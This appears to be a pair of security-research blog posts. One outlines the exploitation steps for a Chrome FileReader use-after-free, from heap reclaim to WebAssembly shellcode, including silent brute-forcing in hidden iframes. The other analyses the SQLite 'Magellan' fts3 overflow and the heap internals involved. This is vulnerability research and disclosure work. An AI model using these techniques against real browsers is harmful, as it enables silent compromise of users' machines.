The vulnerability can be turned into an arbitrary read/write primitive by reclaiming the memory region pointed to by the dangling pointer with JavaScript TypedArrays and corrupting their length and backing store pointers. This can then be further utilized to achieve arbitrary code execution in the renderer process.
Memory Management in Chrome
There are several aspects of memory management in Chrome that affect the reliability of the vulnerability. Chrome uses PartitionAlloc to allocate the backing store of ArrayBuffers. This effectively separates ArrayBuffer backing stores from other kinds of allocations, making the vulnerability unexploitable if the region that is freed is below 2MiB in size because PartitionAlloc will never reuse those allocations for other kinds of data. If the backing store size is above 2MiB, it is placed in a directly mapped region. Once freed, other kinds of allocations can reuse such a region. However, successfully reclaiming the freed region is only possible on 32-bit platforms, as PartitionAlloc adds additional randomness to its allocations via VirtualAlloc and mmap address hinting on 64-bit platforms beside their ASLR slides.
On a 32-bit Windows 7 install, the address space of a fresh Chrome process is similar to the one shown below. Note that these addresses are not static and will differ by the ASLR slide of Windows. Bottom-up allocations start from the lower end of the address space, the last one is the reserved region starting at 36681000. Windows heaps, PartitionAlloc regions, garbage collected heaps of v8 and Chrome, thread stacks are all placed among these regions in a bottom-up fashion. The backing store of the vulnerable ArrayBuffer will also reside here. An important thing to note is that Chrome makes a 512MiB reserved allocation (from 4600000 on the listing below) early on. This is done because the address space on x86 Windows systems is tight and gets fragmented quickly, therefore Chrome makes an early reservation to be able to hand it out for large contiguous allocations, like ArrayBuffers, if needed. Once an ArrayBuffer allocation fails, Chrome frees this reserved region and tries again. The logic that handles this could complicate exploitation, so the exploit starts out by attempting a large (1GiB) ArrayBuffer allocation. This will cause Chrome to free the reserved region, then fail to allocate again, since the address space cannot have a gap of the requested size. While most OOM conditions kill the renderer process, ArrayBuffer allocation failures are recoverable from JavaScript via exception handling.
Another important factor is the non-deterministic nature of the multiple garbage collectors that are involved in the managed heaps of Chrome. This introduces noise in the address space that is hard to control from JavaScript. Since the onprogress events used to trigger the vulnerability are also fired a non-deterministic number of times, and each event causes an allocation, the final location of the vulnerable ArrayBuffer is uncontrollable without the ability to trigger garbage collections on demand from JavaScript. The exploit uses the code shown below to invoke garbage collection. This makes it possible to free the results of onprogress events continuously, which helps in avoiding out-of-memory kills of the renderer process and also forces the dangling pointer created upon triggering the vulnerability to point to the lower end of the address space, somewhere into the beginning of the original 512MiB reserved region.
1 2 3 4 5 6 7 8
function force_gc(){ // forces a garbage collection to avoid OOM kills and help with heap non-determinism try{
var failure =new WebAssembly.Memory({initial:32767}); }catch(e){ // console.log(e.message); } }
Exploitation steps
The exploit achieves code execution by the following steps:
Allocate a large (128MiB) string that will be used as the source of the Blob passed to FileReader. This allocation will end up in the free region following the bottom-up allocations (from 36690000 in the address space listing above).
Free the 512MiB reserved region via an oversized ArrayBuffer allocation, as discussed previously.
Invoke FileReader.readAsArrayBuffer. A number of onprogress event will be triggered, the last couple of which can return references to the same underlying ArrayBuffer if the timing of the events is right. This step can be repeated indefinitely until successful without crashing the process.
Free the backing store of the ArrayBuffer through one of the references. Going forward, another reference can be used to access the dangling pointer.
Reclaim the freed region by spraying the heap with recognizable JavaScript objects, interspersed with TypedArrays.
Look for the recognizable pattern through the dangling reference. This enables leaking the address of arbitrary objects by setting them as properties on the found object, then reading back the property value through the dangling pointer.
Corrupt the backing store of a sprayed TypedArray and use it to achieve arbitrary read write access to the address space.
Load a WebAssembly module. This maps a read-write-executable memory region of 64KiB into the address space.
Traverse the JSFunction object hierarchy of an exported function from the WebAssembly module using the arbitrary read/write primitive to find the address of the read-write-executable region.
Replace the code of the WebAssembly function with shellcode and execute it by invoking the function.
Increasing reliability
A single run of the exploit (which uses the steps detailed above) yields a success rate of about 25%, but using a trick you can turn that into effectively 100% reliability. Abusing the site isolation feature of Chrome enables brute-forcing, as described in another post on this blog by Ki Chan Ahn (look for the section titled “Making a Stealth Exploit by abusing Chrome’s Site Isolation”). A site corresponds to a (scheme:host) tuple, therefore hosting the brute forcing wrapper script on one site which loads the exploit repeatedly in an iframe from another host will cause new processes to be created for each exploit attempt. These iframes can be hidden from the user, resulting in a silent compromise. Using multiple sites to host the exploit code, the process can be parallelized (subject to memory and site-isolation process limits). The exploit developed uses a conservative timeout of 10 seconds for one iteration without parallelization and achieves code execution on average under half a minute.
The entire exploit code can be found on our github and it can be seen in action below.
Detection
The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.
Mitigation
Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.
Conclusion
It’s interesting to see exploits in the wild still targeting older platforms like Windows 7 x86. The 32-bit address space is so crowded that additional randomization is disabled in PartitionAlloc and win32k lockdown is only available starting Windows 8. Therefore, the lack of mitigations on Windows 7 that are present in later versions of Windows make it a relatively soft target for exploitation.
Subscribers of our N-Day feed can leverage our in-depth analysis of critical vulnerabilities to defend themselves better, or use the provided exploits during internal penetration tests.
In December 2018, the Tencent Blade Team released an advisory for a bug they named “Magellan”, which affected all applications using sqlite versions prior to 2.5.3. In their public disclosure they state that they successfully exploited Google Home using this vulnerability. Despite several weeks having passed after the initial advisory, no public exploit was released. We were curious about how exploitable the bug was and whether it could be exploited on 64-bit desktop platforms. Therefore, we set out to create an exploit targeting Chrome on 64-bit Ubuntu.
Background
The Magellan bug is a bug in the sqlite database library. The bug lies in the fts3(Full Text Search) extension of sqlite, which was added in 2007. Chrome started to support the WebSQL standard (which is now deprecated) in 2010, so all versions between 2010 and the patched version should be vulnerable. The bug triggers when running a specific sequence of SQL queries, so only applications that can execute arbitrary SQL queries are vulnerable.
A short glance at the Vulnerability
In order to exploit a bug, the vulnerability has to be studied in detail. The bug was patched in commit 940f2adc8541a838. By looking at the commit, there were actually 3 bugs. We will look at the patch in the “fts3SegReaderNext” function, which was the bug that was actually used during exploitation. The other two bugs are very similar in nature, with the other bugs being slightly more complicated to trigger.
The gist of the patch is summarized below, with the bottom snippet being the patched version.
staticint fts3SegReaderNext(
Fts3Table *p,
Fts3SegReader *pReader, int bIncr ){ int rc;/* Return code of various sub-routines */ char*pNext;/* Cursor variable */ int nPrefix;/* Number of bytes in term prefix */ int nSuffix;/* Number of bytes in term suffix */
staticint fts3SegReaderNext(
Fts3Table *p,
Fts3SegReader *pReader, int bIncr ){ int rc;/* Return code of various sub-routines */ char*pNext;/* Cursor variable */ int nPrefix;/* Number of bytes in term prefix */ int nSuffix;/* Number of bytes in term suffix */
/* Both nPrefix and nSuffix were read by fts3GetVarint32() and so are
** between 0 and 0x7FFFFFFF. But the sum of the two may cause integer
** overflow - hence the (i64) casts. */ if((i64)nPrefix+nSuffix>(i64)pReader->nTermAlloc ){
i64 nNew =((i64)nPrefix+nSuffix)*2; char*zNew = sqlite3_realloc64(pReader->zTerm, nNew); if(!zNew ){ return SQLITE_NOMEM; }
pReader->zTerm = zNew;
pReader->nTermAlloc = nNew; }
The patched version explicitly casts nPrefix and nSuffix to i64, because both nPrefix and nSuffix is declared as int, and the check on the highlighted line can be bypassed if the addition of the two values overflow. By explicitly casting, the check will be correctly assessed, and the allocation size on the following line will also be correctly calculated. This new allocation will be placed in pReader->zTerm, and will further be used in line 38 for a memcpy operation.
Now going back to the version before the patch, there is no explicit casting as seen on line 21, and therefore, if the addition of the two values are larger than 2^31, the result will be negative and the inner code block will not be executed. What this means is that the code does not allocate a new block that is big enough for the memcpy operation below. This has several implications. But to fully understand what the bug gives to us, it is necessary to understand some core concepts of sqlite.
SQLite Internals
SQLite is a C-language library that implements a small, fast, self-contained SQL database engine, that claims to be the most used database engine in the world. SQLite implements most of the core sql features, as well as some features unique in SQLite. This blog post will not go in every detail of the database engine, but more like brush on the concepts that are relevant to the exploit.
SQLite Architecture
This is a summary of the Architecture of SQLite page on the official sqlite homepage. The SQLite is a small virtual machine that emits bytecode that later gets executed by the engine, just like an interpreter would do in a javascript engine. As such, it consists of a Tokenizer, Parser, Code Generator, and a Bytecode Engine. All of the SQL queries that are to be executed have to go through this pipeline. What this means in an exploiter’s point of view is that if the bug occurs in the Bytecode Engine phase, then there will be massive heap noise coming from the previous 3 stages, and the exploiter has to deal with them during Heap Feng-shui.
Another notable thing about SQLite is the use of B-Trees. SQLite uses B-Tree data structures to implement efficient, and fast searches on the values in the database. One thing to keep in mind is that the actual data of B-Trees is kept on disk, and not in memory. This is a logical decision because some databases could get very large, and keeping all the data in memory would induce a large memory overhead. However, performing every search of a query on-disk would introduce a huge disk IO overhead, and hence, SQLite uses something called a Page Cache. This Page Cache is responsible of placing recently queried database data pages onto memory, so that it could re-use them if another query searches for data on the same set of pages. The SQLite engine manages which pages should be mapped into memory and mapped out, so disk and memory overhead is well balanced. This gives another meaning to an exploiter’s point of view. Most objects that are created during a single query execution is destroyed after the Bytecode Engine is done with the query, and the only thing that remains in-memory is the data in the Page Cache. This means the actual data values that are living in the database tables are not a good target for Heap Feng-Shui, because most of the objects that represent the table data will be thrown away immediately after query execution. In addition, the actual table data will only lie somewhere in the middle of the Page Cache, which are just slabs of multiple pages that hold parts of the database file saved on the disk.
Full Text Search extensions
A brief introduction
The SQLite homepage describes Full-Text Search as the following.
FTS3 and FTS4 are SQLite virtual table modules that allows users to perform full-text searches on a set of documents. The most common (and effective) way to describe full-text searches is “what Google, Yahoo, and Bing do with documents placed on the World Wide Web”. Users input a term, or series of terms, perhaps connected by a binary operator or grouped together into a phrase, and the full-text query system finds the set of documents that best matches those terms considering the operators and groupings the user has specified.
Basically, the Full-Text Search (FTS) is an extension on SQLite, that enables it to query for search terms Google-style in an efficient way. The architecture and internals of the Full-Text Search engine is thoroughly described on the respective webpage. SQLite continuously upgraded their FTS engine, from fts1 to fts5. The vulnerability occurs on the 3rd version of the extension, fts3. This specific version is also the only version that is allowed to be used in Chrome. All requests to use the other 4 versions is rejected by Chrome. Therefore, it is important to understand some main concepts behind fts3.
Here is small example of how to issue an fts3 query.
CREATE VIRTUAL TABLE mail USING fts3(subject, body);
This will create an fts table that uses the Full-Text Search version 3 extension, and insert the content into their respective tables. In the above query, only one table mail is created, but under the hood there are 5 more tables created. Some of these tables will be discussed in detail in the following sections. During the INSERT statement, the VALUEs will be split into tokens and all tokens will have an index associated with it and inserted into their respective tables. During the SELECT statement, the search keyword(in the above example ‘sample’) will be looked up in the indexed token tables and if the keyword is matched, then the corresponding rows in the mail table will be returned. This was a brief summary of how the full text search works under the hood. Now it is time to dig in a little deeper into the elements that are related to the exploit.
Shadow Tables
In SQLite, there is something called Shadow Tables, which are basically just regular tables that exist to support the Virtual Table operations. These tables are created under the hood when issuing the CREATE VIRTUAL TABLE statement, and they store either the user INSERT’d data, or supplementary data that’s automatically inserted by the Virtual Table implementation. Since they are basically just regular tables, the content is accessible and modifiable just like any other table. An example of how the shadow tables are created is shown below.
sqlite>CREATE VIRTUAL TABLE mail USING fts3(subject, body);
sqlite>INSERTINTO mail(subject, body)VALUES('sample subject1','sample content');
sqlite>INSERTINTO mail(subject, body)VALUES('sample subject2','hello world');
sqlite>SELECT name FROM sqlite_master WHERETYPE='table';
mail
mail_content
mail_segments
mail_segdir
For instance, when a user issues an INSERT/UPDATE/DELETE statement on an fts3 table, the virtual table implementation modifies the rows in the underlying shadow tables, and not the original table mail that was created during the CREATE VIRTUAL TABLE statement. The reason why this is so is because when the user issues an INSERT statement, the entire content of the value has to be split into tokens, and all those tokens and indexes need to be stored individually, not by the query issued by the user but by the c code implementation of fts3. These tokens and indexes won’t be stored as is, but stored in a custom format defined by fts3 in order to pack all the values as compact as possible. In the fts3 case, the token (or term) and the index will be stored inside the tablename_segments and tablename_segdir shadow table with tablename being replaced with the actual table name that the user specified during the CREATE VIRTUAL TABLE statement. The entire sentence before it was split (sample subject, sample content in the above query) is going to be stored in the tablename_content shadow table. The remaining two shadow tables are tablename_stat and tablename_docsize which are support tables related to statistics, and the total count of index and terms. These two tables are only created when using the fts4 extension. The most important table in this article is the tablename_segdir table, which will be used to trigger the vulnerability later on.
Variable Length Format
In the fts3 virtual table module, the shadow tables store data as SQLite supported data types, or otherwise they are all joined into one giant chunk of data and stored in a compact form as a BLOB. One such example is the table below.
CREATETABLE %_segdir(
level INTEGER,
idx INTEGER,
start_block INTEGER,-- Blockid of first node in %_segments
leaves_end_block INTEGER,-- Blockid of last leaf node in %_segments
end_block INTEGER,-- Blockid of last node in %_segments
root BLOB,-- B-tree root node PRIMARYKEY(level, idx) );
Some values are stored as INTEGER values, but the root column is stored as a BLOB. As mentioned before, the values are stored in a compact format in order to save space. STRING values are stored as-is, with a length value preceding it. But then, how is the length value stored? SQLite uses a format which they term as fts Variable Length Format. How the algorithm works is as follows.
Represent the integer value into bits.
Split the integer value every 7 bits.
Take the current lowest 7 bits. If it is not the last(most significant) 7 bits, then add 1 to the most significant bit to form a full 8 bit value.
Repeat step 3 for all of the following 7bit values.
If it’s the last(most significant) 7bits, then add a 0 to the most significant bit to form a full 8 bit value.
Append all of the bytes that were created on step 3 and step 5 to create one long byte string, and that is the resulting Variable Length Integer.
Why SQLite uses this format is because it wants to use the exact amount of bytes needed to store the integer. It doesn’t want to pad additional 0’s that take up extra space, if the integer were to be saved in a fixed width format such as the standard c types. This format is something to keep in mind when constructing the payload in a later phase of exploitation.
Segment B-Tree Format
The Segment B-Tree is a B-Tree that is tailored to serve for the fts extension’s needs. Since it is a complex format, only the elements related to the vulnerability will be discussed.
These are the fields in the tablename_segdir table. It stores most of the token and index data, and the most important field is the root member. We will focus on this member in detail.
The B-Tree consists of tree nodes and node data. A node can be an interior node, or a leaf. For simplicity’s sake, we will assume that the B-Tree has only a single node, and that node is the root node as well as a leaf node. The format of a leaf node is as follows.
Here is a quote borrowed from the SQLite webpage.
The first term stored on each node (“Term 1” in the figure above) is stored verbatim. Each subsequent term is prefix-compressed with respect to its predecessor. Terms are stored within a page in sorted (memcmp) order.
To give an example, in accordance to the above picture, let’s say Term 1 is apple. The Length of Term 1 is 5, and the content of Term 1 is apple. Doclist 1 follows the format of a Doclist which is described here. They are essentially just an array of VarInt values, but they are not important for the discussion of the exploit and hence, will be skipped. Let’s say Term 2 is april. the Prefix Length of Term 2 will be 2. The Suffix Length of Term 2 will be, let’s say, 3. The Suffix Content of Term 2 is ril. As a last example, Term3’s Prefix Length, Suffix Length, and Suffix Content will be 5, 3, and pie respectively. This describes the term applepie. This might seem a little messy in text, so the following is an illustration of the entire BLOB that was just described.
This is what gets saved into root column of tablename_segdir when the user INSERTs “apple april applepie” into the fts table. As more content is inserted, the tree will grow interior nodes and more leaves, and the BLOB data of the entire tree will be stored in the tablename_segdir and tablename_segment shadow tables. This may not be entirely accurate, but this is basically what the indexing engine does, and how the engine stores all the search keywords and looks them up in a fast and efficient way. It should be noted that all the Length values within this leaf node is stored in a fts VarInt(Variable Length integer) format described above.
Revisiting the Bug
Now that the foundation has been laid out it is time to revisit the bug to get a better understanding of it, and what (initial) primitives the bug provides us. But before we dig into the bug itself, let’s discuss something about shadow tables, and how SQLite treated them before they were hardened in version 3.26.0.
As mentioned above, shadow tables are (were) essentially just normal tables with no access control mechanism on those special tables. As such, anyone that can execute arbitrary SQLite statements can read, modify shadow tables without any restrictions. This can become an issue when the virtual table implementation c code reads content from the shadow tables, and parses it. This is exactly what the bug relies on. The bug requires a value in one of the shadow tables to be set to a specific value, in order to trigger the bug.
After the Magellan bug was reported to SQLite, the developers of SQLite deemed that the ability to modify shadow tables was too powerful, and as a response decided to add a mitigation to it. This is the SQLITE_DBCONFIG_DEFENSIVE flag added in version 3.26.0. The actual bugs were fixed in 3.25.3, but the advisory recommends to upgrade to 3.26.0 in case any other bug is lurking in the code, so that exploitation of the potential bug can be blocked with the flag. Turning on this flag will make the shadow tables read-only to user executed SQL queries, and makes it impossible for malicious SQL queries to modify data within the shadow tables (This is not entirely true because there are lots of places where sql queries are dynamically created by the engine code itself, such as this function. SQL queries executed by the SQLite engine itself are immune to the SQLITE_DBCONFIG_DEFENSIVE flag, so some of these dynamic queries which are constructed based on values supplied by the attacker’s SQL query are potential bypass targets. These attacker controlled values can include spaces and special characters without any issues when the entire value is surrounded by quotes, so it makes it as a possible SQL injection attack vector. Still, the SQLITE_DBCONFIG_DEFENSIVE flag serves as a good front line defense).
staticint fts3SegReaderNext(
Fts3Table *p,
Fts3SegReader *pReader, int bIncr ){ int rc;/* Return code of various sub-routines */ char*pNext;/* Cursor variable */ int nPrefix;/* Number of bytes in term prefix */ int nSuffix;/* Number of bytes in term suffix */
To understand the code, the meaning of some variables should be explained. The fts3SegReaderNext function reads data from the fts3 B-Tree nodes, and traverses through each Term stored in a single node, and builds a full term based on the Term 1 string, and the Prefix and Suffix data for the rest of the Terms. pReader will hold the information of the current Term being built. The pNext variable points to the BLOB data of the tablename_segdir->root column. We will assume that the BLOB contains data that represents a leaf node, and contains exactly 2 Terms. pNext will continuously advance forward as data is read in by the program code. The function ftsGetVarint32 reads in an fts VarInt from the data pNext points to, and stores it into a 32-bit variable. pReader->zTerm will contain malloc’d space that is big enough to hold the term that was built on each iteration.
Now let’s assume that the tablename_segdir->root contains BLOB data such as follows.
The range of Term 1 was expanded to include the leftmost byte, which is a fixed value of 0 but internally represents the Prefix Length of Term 1. In this layout, fts3SegReaderNext would be called 2 times. In the first call, it would allocate a 0x10 sized space for the string apple on line 23 of the previous code listing, and actually copy in the value on line 34. On the second call, it would add the length of the prefix and suffix, and check if it exceeds 5*2 on line 21. Since it doesn’t, it reuses the space created on the first call, and builds a complete term by copying in the prefix and the suffix on line 34. This is done for all terms stored within the current node, but in the above case, it is only called twice. Now consider the following case.
Everything is the same with Term 1. A 0x10 space is allocated and apple is stored. However, on the second iteration, nPrefix is read from the blob as 0x7FFFFFFF, and nSuffix as 1. On line 21, nPrefix + nSuffix is 0x80000000 which is negative, thus bypassing the check which is operated on signed integers, and no allocation is performed. On line 34, The memcpy will operate with the source being &pReader->zTerm[0x7FFFFFFF]. As a note, the reason why the example value of nPrefix is set to 0x7FFFFFFF instead of 0xFFFFFFFF is because the function that actually reads the value, which is fts3GetVarint32, only reads up to a maximum value of 0x7FFFFFFF and any value above that is truncated.
Let’s first assess the meaning of this on a 32-bit platform. pReader->zTerm points to the beginning of apple, so &pReader->zTerm[0x7FFFFFFF] will point to 2 gigabytes after apple, and memcpy will copy 1 byte of the suffix “a” to that location. This is effectively an OOB write to data that is placed 2GB’s after Term 1‘s string. On a 32-bit platform, there is a possibility where &pReader->zTerm[0x7FFFFFFF] actually wraps around the address space and points to an address before apple. This could be used to our advantage, if it is possible to place interesting objects at the wrapped around address.
Now let’s see what elements of the OOB write is controllable. Since the attacker can freely modify the shadow table data, the entire content of the BLOB is controllable. This means that the string of Term 1 is controllable, and in turn, the allocation size of pReader->zTerm is controllable. The offset 0x7FFFFFFF of &pReader->zTerm[0x7FFFFFFF] is also controllable, provided that it is lower than 0x7FFFFFFF. Next, since the Suffix Length of Term 2 is attacker controlled, the memcpy size is also controlled. Finally, the actual data that is copied from the source of the memcpy comes from pNext, which points to Term 2‘s string data, so that is controlled too. This gives a restrictive, but powerful primitive of an OOB write, where the destination chunk size, memcpy source data content, and size is completely attacker controlled. The only requirement is that the target to be corrupted has to be placed 2GB’s after the destination chunk which is apple in the example.
The situation in a 64-bit environment is not very different from 32-bit. Everything is the same, except that &pReader->zTerm[0x7FFFFFFF] has no chance to wrap around the address space because the 64-bit address space is too big for that to happen. Also, in 32-bit, spraying the heap to cover the entire address space is a useful tool that can be used to aid exploitation, but it is not suitable to do so in 64-bit.
Now let’s talk about the restriction of the bug. Because the added values of nPrefix+nSuffix has to be bigger than 0x80000000 in order to pass the check on line 21, only certain nPrefix and nSuffix value pairs can be used to trigger the bug. For instance, a [0x7FFFFFFF, 1] pair is okay. [0x7FFFFFFE, 2], [0x7FFFFFFD, 3], [1, 0x7FFFFFFF], [2, 0x7FFFFFFE] is also okay. But [0x7FFFFFF0, 1] is not okay and will not pass the check and fall into the if block. If it falls into the if block, then a very large allocation will happen and the function will most likely return with SQLITE_NOMEM. Therefore, based on the values that are accepted by the bug, we can OOB write data in the following ranges.
Basically, the overwritten data must include the byte that is exactly 0x7FFFFFFF bytes away from the memcpy destination, and it could overwrite data either backwards or forward, with attacker controlled data of any size. This is the positional restriction of the bug. The OOB write cannot start at an arbitrary offset. After assessing the primitives given by the bug, we came to the conclusion that the bug could very well be exploitable on 64-bit platforms, provided that there is a good target for corruption, where the target object has certain tolerance for marginal errors. The next sections will describe the entire process of exploitation, including which targets were picked for corruption, and how they were abused for information leak and code execution.
Exploitation
Before diving in, it should be noted that the exploit was not designed to be 100% reliable. There are some sources of failure and some of them were addressed, but the ones that were too time consuming to fix were just left as is. The exploit was built as means to show that the bug is exploitable on Desktop platforms, and as such, the focus was placed on pushing through to achieve code execution, not maximizing reliability and speed. Nevertheless, we will discuss potential pitfalls and sources of failure on each stage of exploitation, and suggest possible solutions to address them.
The exploit is divided into 11 stages. The reason for dividing is because all SQL queries can not be stuffed into one huge transaction, because certain queries had to be split in order to achieve reliable corruption. Furthermore, a lot of SQL queries were dependent on previous queries, such as the infoleak phase, so the previous query results had to be parsed from javascript and passed on to the next batch of SQL queries. Each of the 11 stages will be described in detail, from the meaning of the cryptic queries, to the actual goal that the stage is trying to achieve.
The TCMalloc allocator
Before even attempting to build an exploit, it is essential to understand the allocator in play. The application that links the sqlite library would most likely use the system allocator that lies underneath, but in the situation of Chrome, things are a little different. According to the heap design documents of Chrome, Chrome hooks all calls to malloc and related calls, and redirects them to other custom allocators. This is different for every operating system, so it is important to understand which allocator Chrome chooses to use instead of the system allocators. In the case of Linux, Chrome redirects every malloc operation to TCMalloc. TCMalloc is an allocator developed and maintained by Google, with certain security properties kept in mind during development, as well as being a fast and efficient allocator.
The TCMalloc works very similar to allocators such as jemalloc, or the LFH, which splits a couple pages into equal sized chunks, and groups each different-sized chunks into seperate freelists. The way they are linked are kind of like PTMalloc’s fastbins, in that they are linked in a singly-linked list. The way they split a page into equal sized chunks kind of resembles that of jemalloc. However, unlike the LFH, there is no randomness element added in to the freelists, which makes the job easier. There are 2 (more specifically, 3) size categories of TCMalloc. In Chrome, chunks that have sizes lower than 0x8000 are categorized as small chunks, where sizes bigger are large chunks. The small chunks are further divided into 54 size classes (this value is specific to Chrome), and each chunks are grouped/managed by their respective size class. The free chunks are linked by singly-linked list as described above. In TCMalloc, there is something called a per-thread cache, and a central page cache. The threads each have their own freelists to manage their pool of small chunks. If the free-list of a certain chunk size reaches a certain threshold (this threshold is dynamic and changes to adapt to the heap usage), then the per-thread cache can toss a chunk of that chunk size’s freelist to the central cache. Or, if the combined size of all free chunks on all size classes of the thread cache reaches a threshold (4MB on Chrome), then the garbage collector kicks in and collects chunks from all freelists on the thread cache and gives them to the central cache. The central cache is the manager for all thread cachces. It issues new freelists if a thread cache’s freelists is exhausted, or it collects chunks of freelists if a thread cache’s freelist grows too big. The central cache is also the manager for large chunks. All chunk sizes larger than 0x8000 request chunks from the central cache, and the central cache manages the freelist of large chunks either by a singly-linked list, or a red-black tree.
All of this might seem too convoluted on text. Here are some illustrations borrowed from Sean Heelan’s excellent slides from 2011 InfiltrateCon.
An overview of the Thread Cache and the Central Page Cache
How the Central Cache conjures a new freelist
Singly-linked list of each size class of small chunks
The algorithm of tc_malloc(small_chunk_size)
Also, the following links are very helpful to get a general overview of how the TCMalloc allocator works.
And of course, the best reference is the source code itself.
Stage 1 and Stage 2
Now that the basics of the allocator have been touched, it’s time to find the right object to corrupt. One of the first targets that comes to mind is the Javascript objects on the v8 heap. This was the first target that we went for, because corrupting the right javascript object would instantly yield relative R/W, which can further be upgraded to an AAR/AAW. However, due to the way PartitionMalloc requests pages from the underlying system allocator, it was impossible to have the v8 heap placed behind TCMalloc’s heap. Even if it happened, chances were near zero.
Therefore, we decided to go for objects that are bound to be on the same heap. That is, objects that are allocated by SQLite itself. As mentioned in the SQLite Architecture section, the actual data value of the tables are not good targets to manipulate the heap. The B-Tree that represents the data also live on the Page Cache or the database file on disk. Even if parts of the B-Tree is briefly constructed in-memory upon a SELECT statement, it’s going to be immediately purged as soon as the Bytecode engine is done executing the SELECT statement. There would seem a very limited choice for objects that could influence the heap in a controlled fashion, if the table data values can not be used. However, there is one more object that could make a good candidate.
That is, Table and Column objects. It just so happens that SQLite decided to keep all Table and Column objects that were created by a CREATE statement in memory, and those objects persists until the database is closed completely. The decision behind this would be based on the assumption that Table and Column objects would not be too over-bloated, or at least the developers thought that such case would be rare enough, that the performance advantage of keeping those objects in memory would outweigh the memory costs of those objects. This is true to some degree. However, in practice, it is theoretically possible to construct Column Objects that could eat a colossal amount of memory while persisting in memory. This can be observed in the Limits In SQLite webpage.
The maximum number of bytes in the text of an SQL statement is limited to SQLITE_MAX_SQL_LENGTH which defaults to 1000000. You can redefine this limit to be as large as the smaller of SQLITE_MAX_LENGTH and 1073741824.
One thing to notice is that SQLite does not have an explicit limit on the length of a column name, or a table name. Both of them are just governed by the length of the SQL statement that contains those names, which is SQLITE_MAX_LENGTH. So as long as the length of the user query is lower than SQLITE_MAX_LENGTH, SQLite would happily accept column names of any size. Although SQLite itself defaults SQLITE_MAX_SQL_LENGTH to 1000000, Chrome redefines this value as 1000000000.
1 2 3 4 5 6 7 8 9 10
/* ** The maximum length of a single SQL statement in bytes. ** ** It used to be the case that setting this value to zero would ** turn the limit off. That is no longer true. It is not possible ** to turn this limit off. */ #ifndef SQLITE_MAX_SQL_LENGTH # define SQLITE_MAX_SQL_LENGTH 1000000000 #endif
1000000000 is a very big value. It is almost 1GB. What this means is that theoretically, it is possible to create column names that are approximately 1GB, and make them persist in memory. Before discussing what we’re going to do with the Column values, let’s look at the structures of the objects involved on column name creation, and the code that handles them.
When a table is created by the CREATE statement, the tokenizer would tokenize the entire SQL query, and pass the tokens to the parser. Under the hood, SQLite uses the Lemon Parser Generator. Lemon is similar to the more popular YACC or BISON parsers, but has a different grammar and is maintained by SQLite. The Lemon parser generator will parse context-free code that is written in Lemon grammar syntax, and generates an LALR parser in C code. In SQLite, the bulk of the generated C code can be found in the yy_reduce function. The actual context-free code that Lemon parses is found in parse.y, and the code that is used for CREATE statements is found here. A snippet of the code is shown below.
The bulk of the Table creation logic is performed in the sqlite3StartTable function, and the Column handling logic is found in sqlite3AddColumn. Let’s visit the sqlite3StartTable function and take a brief look.
void sqlite3StartTable(
Parse *pParse, /* Parser context */
Token *pName1, /* First part of the name of the table or view */
Token *pName2, /* Second part of the name of the table or view */ int isTemp, /* True if this is a TEMP table */ int isView, /* True if this is a VIEW */ int isVirtual, /* True if this is a VIRTUAL table */ int noErr /* Do nothing if table already exists */ ){ Table *pTable; char*zName =0;/* The name of the new table */
sqlite3 *db = pParse->db;
Vdbe *v; int iDb;/* Database number to create the table in */
Token *pName;/* Unqualified name of the table to create */
The most important object for our purposes is the Table object. This structure contains every information of the table created by the CREATE statement, and the definition is as follows.
struct Table { char*zName;/* Name of the table or view */ Column *aCol;/* Information about each column */ Index *pIndex;/* List of SQL indexes on this table. */
Select *pSelect;/* NULL for tables. Points to definition if a view. */
FKey *pFKey;/* Linked list of all foreign keys in this table */ char*zColAff;/* String defining the affinity of each column */
ExprList *pCheck;/* All CHECK constraints */ /* ... also used as column name list in a VIEW */ int tnum;/* Root BTree page for this table */
u32 nTabRef;/* Number of pointers to this Table */
u32 tabFlags;/* Mask of TF_* values */
i16 iPKey;/* If not negative, use aCol[iPKey] as the rowid */ i16 nCol;/* Number of columns in this table */ LogEst nRowLogEst;/* Estimated rows in table - from sqlite_stat1 table */
LogEst szTabRow;/* Estimated size of each table row in bytes */
u8 keyConf;/* What to do in case of uniqueness conflict on iPKey */ int addColOffset;/* Offset in CREATE TABLE stmt to add a new column */ int nModuleArg;/* Number of arguments to the module */ char**azModuleArg;/* 0: module 1: schema 2: vtab name 3...: args */
VTable *pVTable;/* List of VTable objects. */
Trigger *pTrigger;/* List of triggers stored in pSchema */
Schema *pSchema;/* Schema that contains this table */
Table *pNextZombie;/* Next on the Parse.pZombieTab list */ };
For our purposes, the most important fields is aCol and nCol. Next, we will look at the sqlite3AddColumn function.
if( pType->n==0){ /* If there is no type specified, columns have the default affinity ** 'BLOB' with a default size of 4 bytes. */
pCol->affinity = SQLITE_AFF_BLOB;
pCol->szEst =1; #ifdef SQLITE_ENABLE_SORTER_REFERENCES if(4>=sqlite3GlobalConfig.szSorterRef){
pCol->colFlags |= COLFLAG_SORTERREF; } #endif }else{
zType = z + sqlite3Strlen30(z)+1; memcpy(zType, pType->z, pType->n);
zType[pType->n]=0;
sqlite3Dequote(zType); pCol->affinity = sqlite3AffinityType(zType, pCol); pCol->colFlags |= COLFLAG_HASTYPE; } p->nCol++; pParse->constraintName.n=0; }
The important parts of the logic are highlighted. Several things can be observed from this function. First, as mentioned above, there is no limit on the length of the column name. However, there is a limit of how many columns can exist on a single table, and that value is defined by db->aLimit[SQLITE_LIMIT_COLUMN]. The value comes from a #define value in the SQLite source code, and is set to 2000.
/*
** This is the maximum number of
**
** * Columns in a table
** * Columns in an index
** * Columns in a view
** * Terms in the SET clause of an UPDATE statement
** * Terms in the result set of a SELECT statement
** * Terms in the GROUP BY or ORDER BY clauses of a SELECT statement.
** * Terms in the VALUES clause of an INSERT statement
**
** The hard upper limit here is 32676. Most database people will
** tell you that in a well-normalized database, you usually should
** not have more than a dozen or so columns in any table. And if
** that is the case, there is no point in having more than a few
** dozen values in any of the other situations described above.
*/ #ifndef SQLITE_MAX_COLUMN # define SQLITE_MAX_COLUMN 2000 #endif
This is something to keep in mind for later.
Also, column names can not be duplicate. Next, the column properties are stored in an array of Column objects, which tableObject->aCol points to. This array grows by every 8 new columns, which can be seen in line 26. This function also sets various flags of the Column object. The definition of the Column structure is as follows.
1 2 3 4 5 6 7 8 9 10 11 12 13
/*
** information about each column of an SQL table is held in an instance
** of this structure.
